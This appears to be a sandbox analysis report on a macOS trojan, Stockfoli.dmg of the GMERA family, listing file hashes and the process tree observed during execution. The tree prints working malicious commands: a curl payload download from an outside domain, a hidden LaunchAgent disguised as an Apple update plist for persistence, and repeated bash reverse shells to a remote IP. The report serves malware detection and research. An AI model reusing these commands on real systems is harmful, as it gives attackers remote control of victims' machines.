gmera | 118ba3642fdff254e37aee1ff9552fe189f7b1f8d5302d51c5010335acce6c2c

Analysis

max time network
159s
platform
macos_amd64
resource
macos
submitted
24-06-2021 12:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Stockfoli.dmg
Size

11.2MB
MD5

22a526c0658e542f24358178fb079c38
SHA1

352985598e83b42e99dfcb19636227335a18f8c0
SHA256

118ba3642fdff254e37aee1ff9552fe189f7b1f8d5302d51c5010335acce6c2c
SHA512

73c37880c044235028708e81d840120e78951a5ab4c100338ee958bce2409890a3c9dee75eab95dd8e37e98bd73c4561ff7a3413669527fa5ef458cce26971af

Score

10^/10

gmera adware

Malware Config

Signatures

GMERA
GMERA family.
adware gmera
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

25 ipecho.net

flow	ioc
25	ipecho.net

/bin/sh
sh -c "sudo open /Volumes/Stockfoli/Stockfoli.app"
1⤵
PID:552

/bin/bash
sh -c "sudo open /Volumes/Stockfoli/Stockfoli.app"
1⤵
PID:552

/usr/bin/sudo
sudo open /Volumes/Stockfoli/Stockfoli.app
1⤵
PID:552
- /usr/bin/open
  open /Volumes/Stockfoli/Stockfoli.app
  2⤵
  PID:553

/Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli
/Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli
1⤵
PID:554

/bin/bash
/bin/bash -c "nohup sh '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh' </dev/null >/dev/null 2>&1 &"
1⤵
PID:562
- /usr/bin/nohup
  nohup sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
  2⤵
  PID:563
- /usr/bin/sh
  sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
  2⤵
  PID:563
- /bin/sh
  sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
  2⤵
  PID:563
- /bin/bash
  sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
  2⤵
  PID:563
- - /usr/bin/curl
    curl -ks "http://owpqkszz.info/link.php?run&91.219.237.21"
    3⤵
    PID:585
- - /usr/bin/base64
    base64 --decode
    3⤵
    PID:587
- - /bin/cat
    cat /tmp/.com.apple.upd.plist
    3⤵
    PID:588
- - /bin/cp
    cp /tmp/.com.apple.upd.plist /Users/run/Library/LaunchAgents/.com.apple.upd.plist
    3⤵
    PID:589
- - /bin/cat
    cat /Users/run/Library/LaunchAgents/.com.apple.upd.plist
    3⤵
    PID:590
- - /bin/launchctl
    launchctl load /tmp/.com.apple.upd.plist
    3⤵
    PID:591
- - /usr/bin/screen
    screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"
    3⤵
    PID:596

/usr/bin/whoami
whoami
1⤵
PID:566

/usr/bin/tr
tr -dc "[:alnum:].\\r"
1⤵
PID:568

/usr/bin/tr
tr "[:upper:]" "[:lower:]"
1⤵
PID:569

/usr/bin/curl
curl -s ipecho.net/plain
1⤵
PID:572

/bin/bash
/bin/bash -c "nohup '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio' </dev/null >/dev/null 2>&1 &"
1⤵
PID:573
- /usr/bin/nohup
  nohup /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio
  2⤵
  PID:574
- /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio
  /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio
  2⤵
  PID:574

/bin/bash
/bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25734 0>&1'"
1⤵
PID:575

/usr/bin/screen
screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"
1⤵
PID:575

/usr/bin/login
login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"
1⤵
PID:577
- /bin/bash
  bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"
  2⤵
  PID:580
- - /bin/bash
    bash -i
    3⤵
    PID:581

/bin/bash
/bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25735 0>&1"
1⤵
PID:578
- /bin/bash
  bash -i
  2⤵
  PID:579

/usr/bin/tr
tr -dc "[:alnum:].\\r"
1⤵
PID:583

/usr/bin/tr
tr "[:upper:]" "[:lower:]"
1⤵
PID:584

/bin/launchctl
launchctl list
1⤵
PID:594

/usr/bin/grep
grep upd
1⤵
PID:595

/usr/bin/login
login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"
1⤵
PID:601
- /bin/bash
  bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"
  2⤵
  PID:603
- - /bin/bash
    bash -i
    3⤵
    PID:604

/bin/bash
/bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25736 0>&1'"
1⤵
PID:617

/usr/bin/screen
screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"
1⤵
PID:617

/usr/bin/login
login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"
1⤵
PID:619
- /bin/bash
  bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"
  2⤵
  PID:620
- - /bin/bash
    bash -i
    3⤵
    PID:621

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/Users/run/Library/LaunchAgents/.com.apple.upd.plist

MD5
d1ec6e05e4d46e06768d1e57bbe4a0e1

SHA1
ee6e20dcf2682bdf84d0614287c8053cc71fd744

SHA256
be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787

SHA512
a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b

Download Submit
/Users/run/Library/LaunchAgents/.com.apple.upd.plist

MD5
d1ec6e05e4d46e06768d1e57bbe4a0e1

SHA1
ee6e20dcf2682bdf84d0614287c8053cc71fd744

SHA256
be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787

SHA512
a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b

Download Submit
/private/tmp/.com.apple.upd.plist

MD5
d1ec6e05e4d46e06768d1e57bbe4a0e1

SHA1
ee6e20dcf2682bdf84d0614287c8053cc71fd744

SHA256
be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787

SHA512
a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b

Download Submit
/private/tmp/.com.apple.upd.plist

MD5
d1ec6e05e4d46e06768d1e57bbe4a0e1

SHA1
ee6e20dcf2682bdf84d0614287c8053cc71fd744

SHA256
be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787

SHA512
a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b

Download Submit
/private/tmp/loglog

MD5
ebb0a7faa9956546a1e4992db15c1f89

SHA1
9abe892e93d3605337dc84ba8f7573899b0585e5

SHA256
411eb63035d57f9bb853e0327a91f2ad6ae556acd188080a30c45554f4f3b402

SHA512
7303bf0471741cf275f0549903b8d6bd63df61ff9e83724ba15ca5f35f0902ac92e9d1b5e485bc29a765d58309b146a12af77eb9f66e4b1a5d729a58fc4db1eb

Download Submit
/private/tmp/loglog

MD5
6e5880928c8832d3614aa53aa235233e

SHA1
be92842845246b2597a9152c5f8ef24e4dd03280

SHA256
12705856ce91227826e9417a9dc7922282bf44eecc6552a3f697ca080c112378

SHA512
351b4281d6db26d36af48e264613ab06853eab16a489f1ad10254ce38d561e03aa75d7f1c1b9002e3bbd3b6b908aa7a93bad1a165c63109bc6554c8b447b5e02

Download Submit
/private/tmp/loglog

MD5
26d78f389693c76036ddb71f35f6d7ae

SHA1
52d6d045c85d605d1afe366e42ebea6cfdd0810f

SHA256
d32fbb35f51332e76e6df6eb792368a2e6a2421cccd7e5eba27e4f319e493de1

SHA512
ae4743ea9150145ea062a7717d16b967732e67724aaf4815649c428b0d1338a3afa579926dced6e7d7198ff8ca9b843e472f6d55df4c185c234bc586aaa27948

Download Submit
/private/tmp/loglog

MD5
31206400a83d7a6291b8dc764b7b18f0

SHA1
dfe5e40feb3ed7bdb2ee434ff3191a42faeb081d

SHA256
25bce9fc18e91fa17854e7904190da5497c6cfb9ffc4e57a3bc24ac8f04bdc1a

SHA512
e71820ebd01ed0b03039501dd83379266772231db508d2c0cf4dd458d5aab117c9292ab9a45883087a5736ce64ed160775ce809ab690bb63da1bde99861d7e39

Download Submit
/private/tmp/loglog

MD5
4c8809a4fad99ad274099983b070f059

SHA1
231177c87e812eb5c19f6cbf38526d5f0b4c8286

SHA256
f4e8ef394af12068df92a2dca293f492c8700bb8817d56b2dc534787b1967af9

SHA512
8406e0fd623fb5042ace549374a9e7066be99f23e4d02ccc95740c70f3622a10f0c306b8b800d8293d0d32b9df25e166cfb2abc08da038b45b20503e1af9ebcd

Download Submit
/private/tmp/loglog

MD5
8ad6e7f6971a37ba964efb5866e8f908

SHA1
ac86662a9dc52dbf6740f465533ef61fab7c8f72

SHA256
114beee220c7c523e9eba6a8dbbdbfbef3d1e330d7722a6aff49203218d3f4e8

SHA512
b023fe9b118a6a3b36b0eff8ff47bce2988740ff1ec34f7536b1fe637b060f44743dcc902cf17981cdbe5bd760b77957db46236029a25798cd30e1644e56ae29

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads